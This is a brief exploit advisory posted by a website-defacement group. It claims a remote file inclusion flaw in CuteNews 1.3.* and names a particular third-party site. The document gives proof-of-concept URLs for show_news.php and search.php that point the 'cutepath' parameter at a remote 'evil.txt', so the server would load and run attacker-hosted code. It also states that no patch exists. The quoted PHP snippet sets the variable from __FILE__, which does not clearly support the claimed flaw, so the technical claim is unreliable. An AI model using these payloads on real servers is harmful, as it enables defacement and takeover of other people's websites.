Welcome people In World Defacers Team [W]orld [D]efacers Team ====================================== --------------------Summary---------------- eVuln ID: WD22 Vendor: CuteNews 1.3.* Vendor's Web Site: http://cutephp.com/ Software: Live Customer Support Solution :- http://www.pansionat.net/novost/ Class: Remote PoC/Exploit: Available Solution: Not Available Discovered by: rUnViRuS (worlddefacers.de) -----------------Description--------------- $cutepath = __FILE__; $cutepath = preg_replace( "'\\\search\.php'", "", $cutepath); $cutepath = preg_replace( "'/search\.php'", "", $cutepath); require_once("$cutepath/inc/functions.inc.php"); --------------PoC/Exploit---------------------- show_news.php?cutepath=http://host/evil.txt? search.php?cutepath=http://host/evil.txt? --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: rUnViRuS (worlddefacers.de)
